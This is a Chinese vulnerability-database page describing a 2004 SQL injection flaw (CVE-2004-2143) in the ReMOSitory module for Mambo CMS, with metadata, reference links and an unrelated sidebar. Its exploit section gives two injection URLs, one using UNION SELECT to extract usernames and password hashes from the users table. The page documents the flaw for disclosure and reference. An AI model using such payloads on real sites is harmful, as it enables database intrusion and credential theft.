ReMOSitory Server远程SQL注入漏洞-安全小百科

ReMOSitory Server远程SQL注入漏洞

漏洞ID	1108178	漏洞类型	输入验证
发布时间	2004-09-18	更新时间	2005-10-20
CVE编号	CVE-2004-2143	CNNVD-ID	CNNVD-200412-1187
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/24613
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1187

|漏洞详情

MamboOpenSource是一套基于PHP和MySql的开源网站内容管理系统（CMS）。该系统支持搜索引擎优化、模板/主题下载和流量统计等。ReMOSitoryServer是MamboOpenServer扩展组件。ReMOSitoryServer不正确处理用户提交的URL参数，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感数据库信息。主要问题是对用户提交给’filecatid’参数数据缺少充分过滤，用户提交包含恶意SQL命令的数据作为此参数数据，可更改原有SQL逻辑，获得敏感信息或可能更改数据库数据。

|漏洞EXP

source: http://www.securityfocus.com/bid/11219/info

It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.

http://www.example.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*
http://www.example.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9
,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*

|参考资料

来源:www.mamboportal.com
链接:http://www.mamboportal.com/content/view/1615/
来源:SECTRACK
名称:1011356
链接:http://securitytracker.com/id?1011356
来源:SECUNIA
名称:12597
链接:http://secunia.com/advisories/12597/
来源:XF
名称:remository-filecatid-sql-injection(17441)
链接:http://xforce.iss.net/xforce/xfdb/17441
来源:BID
名称:11219
链接:http://www.securityfocus.com/bid/11219
来源:OSVDB
名称:10040
链接:http://www.osvdb.org/10040
来源:BUGTRAQ
名称:20040919Re:MamboPortallastedversion4.5.1(1.09)andlowervesion:SQLinjectionVulnerability.
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html
来源:BUGTRAQ
名称:20040917MamboPortallastedversion4.5.1(1.09)andlowervesion:SQLinjectionVulnerability.
链接:http://archives.neohapsis.com/archives/bugtraq/2004-09/0215.html
来源：NSFOCUS
名称：6908
链接：http://www.nsfocus.net/vulndb/6908

相关推荐: Microsoft JVM Package Access Restriction Bypassing Vulnerability

Microsoft JVM Package Access Restriction Bypassing Vulnerability 漏洞ID 1101294 漏洞类型 Access Validation Error 发布时间 2002-11-08 更新时间 20…

文章版权归作者所有，未经允许请勿转载。

THE END

网络安全漏洞
# 漏洞 # cnnvd # remository

喜欢就支持一下吧

ReMOSitory Server远程SQL注入漏洞

ReMOSitory Server远程SQL注入漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

日常避险攻略

紧张局势重大升级！“第三次世界大战威胁迫近”

ChatGPT问答: RiscV 汇编怎么写 1到100 数字之和代码 RISC-V 汇编语言入门 add, sub, lw, sw, j 常用指令

RARS 汇编模拟器支持的RISC-V指令

使用FFMPEG快速替换视频中的音频

2023.03.26 我去年买了个表，一直走不准，现在终于可以设置时间了

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

Halflife Linux Server rcon Vulnerabilities

鲲鹏展翅力算未来 | 亚洲诚信被授予华为鲲鹏合作伙伴认证 – 作者:trustasia

Brian Stanback bsguest.cgi Remote Command Execution Vulnerability

linux 各种发行版-忘记root密码的对应措施

MuOnline Loopholes Web Server – ‘pkok.asp’ SQL Injection

Cisco IOS路由器或设备崩溃漏洞

付费下载测试

Python网络开发简单的IP城市定位WebAPI

zibll子比主题 v5.6最新免授权版

创建不做身份鉴定的HTTPClient发送HTTPS的POST请求的工具类，解决异常：sun.security.validator.ValidatorException: PKIX path vali

Attack tive Directory – 作者:sec875

免费领爱企查两年会员

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa